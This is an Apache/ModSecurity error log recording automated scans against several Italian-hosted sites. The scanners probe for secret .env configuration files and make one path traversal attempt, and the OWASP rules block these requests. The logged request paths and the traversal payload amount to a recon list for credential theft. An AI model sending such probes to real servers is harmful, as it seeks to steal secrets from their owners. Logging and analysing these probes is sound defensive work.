[Thu Sep 11 12:47:39.354124 2025] [:error] [pid 2641809] [client 93.123.109.81:44272] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aMKoy-EVWQ_asFH7Xv3-QAAAAAM"]
[Thu Sep 11 12:47:39.594381 2025] [:error] [pid 2641807] [client 93.123.109.81:41552] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aMKoy8ocZ7Yf79rE2oe6MQAAAAE"]
[Thu Sep 11 12:47:39.594623 2025] [:error] [pid 2641807] [client 93.123.109.81:41552] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aMKoy8ocZ7Yf79rE2oe6MQAAAAE"]
[Thu Sep 11 12:47:39.594799 2025] [:error] [pid 2641807] [client 93.123.109.81:41552] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aMKoy8ocZ7Yf79rE2oe6MQAAAAE"]
[Thu Sep 11 12:47:39.844607 2025] [:error] [pid 2641842] [client 93.123.109.81:41568] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aMKoyyuUPG8dh0hHFAIviwAAAAU"]
[Thu Sep 11 12:47:39.844860 2025] [:error] [pid 2641842] [client 93.123.109.81:41568] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aMKoyyuUPG8dh0hHFAIviwAAAAU"]
[Thu Sep 11 12:47:39.845023 2025] [:error] [pid 2641842] [client 93.123.109.81:41568] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aMKoyyuUPG8dh0hHFAIviwAAAAU"]
[Thu Sep 11 12:47:40.116098 2025] [authz_core:error] [pid 2641810] [client 93.123.109.81:41570] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Sep 11 12:47:40.296785 2025] [:error] [pid 2641806] [client 93.123.109.81:41574] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aMKozBoLF0JPPSQEIDv1VgAAAAA"]
[Thu Sep 11 12:47:40.297015 2025] [:error] [pid 2641806] [client 93.123.109.81:41574] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aMKozBoLF0JPPSQEIDv1VgAAAAA"]
[Thu Sep 11 12:47:40.297163 2025] [:error] [pid 2641806] [client 93.123.109.81:41574] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aMKozBoLF0JPPSQEIDv1VgAAAAA"]
[Thu Sep 11 12:47:41.613589 2025] [:error] [pid 2641842] [client 93.123.109.81:41636] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aMKozSuUPG8dh0hHFAIvjAAAAAU"]
[Thu Sep 11 12:47:41.613823 2025] [:error] [pid 2641842] [client 93.123.109.81:41636] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aMKozSuUPG8dh0hHFAIvjAAAAAU"]
[Thu Sep 11 12:47:41.613984 2025] [:error] [pid 2641842] [client 93.123.109.81:41636] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aMKozSuUPG8dh0hHFAIvjAAAAAU"]
[Thu Sep 11 12:47:41.868532 2025] [:error] [pid 2641810] [client 93.123.109.81:41652] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aMKozZyTQF_NsWhvrdiQbQAAAAQ"]
[Thu Sep 11 12:47:41.868765 2025] [:error] [pid 2641810] [client 93.123.109.81:41652] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aMKozZyTQF_NsWhvrdiQbQAAAAQ"]
[Thu Sep 11 12:47:41.868939 2025] [:error] [pid 2641810] [client 93.123.109.81:41652] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aMKozZyTQF_NsWhvrdiQbQAAAAQ"]
[Thu Sep 11 12:47:42.042404 2025] [:error] [pid 2641806] [client 93.123.109.81:41658] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aMKozhoLF0JPPSQEIDv1VwAAAAA"]
[Thu Sep 11 12:47:42.042690 2025] [:error] [pid 2641806] [client 93.123.109.81:41658] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aMKozhoLF0JPPSQEIDv1VwAAAAA"]
[Thu Sep 11 12:47:42.042849 2025] [:error] [pid 2641806] [client 93.123.109.81:41658] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aMKozhoLF0JPPSQEIDv1VwAAAAA"]
[Thu Sep 11 17:10:47.461222 2025] [authz_core:error] [pid 2641806] [client 185.165.171.225:50056] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/webroot
[Thu Sep 11 17:59:15.569418 2025] [:error] [pid 2641810] [client 176.65.148.43:51780] [client 176.65.148.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMLx05yTQF_NsWhvrdiQmQAAAAQ"]
[Thu Sep 11 17:59:15.569675 2025] [:error] [pid 2641810] [client 176.65.148.43:51780] [client 176.65.148.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMLx05yTQF_NsWhvrdiQmQAAAAQ"]
[Thu Sep 11 17:59:15.569832 2025] [:error] [pid 2641810] [client 176.65.148.43:51780] [client 176.65.148.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMLx05yTQF_NsWhvrdiQmQAAAAQ"]
[Fri Sep 12 11:00:06.524149 2025] [:error] [pid 2667235] [client 185.165.171.225:45756] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /artemis/1/../env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/artemis/1/..;/env"] [unique_id "aMPhFlpFd0-lsmu78YoaeQAAAAI"]
[Fri Sep 12 11:00:06.524645 2025] [:error] [pid 2667235] [client 185.165.171.225:45756] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/artemis/1/..;/env"] [unique_id "aMPhFlpFd0-lsmu78YoaeQAAAAI"]
[Fri Sep 12 11:00:06.524826 2025] [:error] [pid 2667235] [client 185.165.171.225:45756] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/artemis/1/..;/env"] [unique_id "aMPhFlpFd0-lsmu78YoaeQAAAAI"]
[Sat Sep 13 08:26:02.278385 2025] [:error] [pid 2695626] [client 23.180.120.244:55606] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMUOep2pIG8NNQvt5p44EQAAAAg"]
[Sat Sep 13 08:26:02.280104 2025] [:error] [pid 2695626] [client 23.180.120.244:55606] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMUOep2pIG8NNQvt5p44EQAAAAg"]
[Sat Sep 13 08:26:02.280308 2025] [:error] [pid 2695626] [client 23.180.120.244:55606] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMUOep2pIG8NNQvt5p44EQAAAAg"]
[Sat Sep 13 08:26:02.571890 2025] [:error] [pid 2692298] [client 23.180.120.244:55622] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMUOeuH5V83YU5tbwDETdAAAAAM"]
[Sat Sep 13 08:26:02.572161 2025] [:error] [pid 2692298] [client 23.180.120.244:55622] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMUOeuH5V83YU5tbwDETdAAAAAM"]
[Sat Sep 13 08:26:02.572348 2025] [:error] [pid 2692298] [client 23.180.120.244:55622] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMUOeuH5V83YU5tbwDETdAAAAAM"]
[Sat Sep 13 08:26:02.801059 2025] [:error] [pid 2692295] [client 23.180.120.244:55628] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMUOenx5A9KjH0PuQraELgAAAAA"]
[Sat Sep 13 08:26:02.801338 2025] [:error] [pid 2692295] [client 23.180.120.244:55628] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMUOenx5A9KjH0PuQraELgAAAAA"]
[Sat Sep 13 08:26:02.801494 2025] [:error] [pid 2692295] [client 23.180.120.244:55628] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMUOenx5A9KjH0PuQraELgAAAAA"]
[Sat Sep 13 08:26:03.137077 2025] [:error] [pid 2692299] [client 23.180.120.244:55634] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMUOe2Ddb-5AdnYan-MpvQAAAAQ"]
[Sat Sep 13 08:26:03.137331 2025] [:error] [pid 2692299] [client 23.180.120.244:55634] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMUOe2Ddb-5AdnYan-MpvQAAAAQ"]
[Sat Sep 13 08:26:03.137521 2025] [:error] [pid 2692299] [client 23.180.120.244:55634] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMUOe2Ddb-5AdnYan-MpvQAAAAQ"]
[Sat Sep 13 08:26:03.347795 2025] [authz_core:error] [pid 2692835] [client 23.180.120.244:55640] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sat Sep 13 08:26:03.614978 2025] [:error] [pid 2697334] [client 23.180.120.244:55644] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMUOe_KjSJCBzx1WfB9W7AAAAAE"]
[Sat Sep 13 08:26:03.615263 2025] [:error] [pid 2697334] [client 23.180.120.244:55644] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMUOe_KjSJCBzx1WfB9W7AAAAAE"]
[Sat Sep 13 08:26:03.615460 2025] [:error] [pid 2697334] [client 23.180.120.244:55644] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMUOe_KjSJCBzx1WfB9W7AAAAAE"]
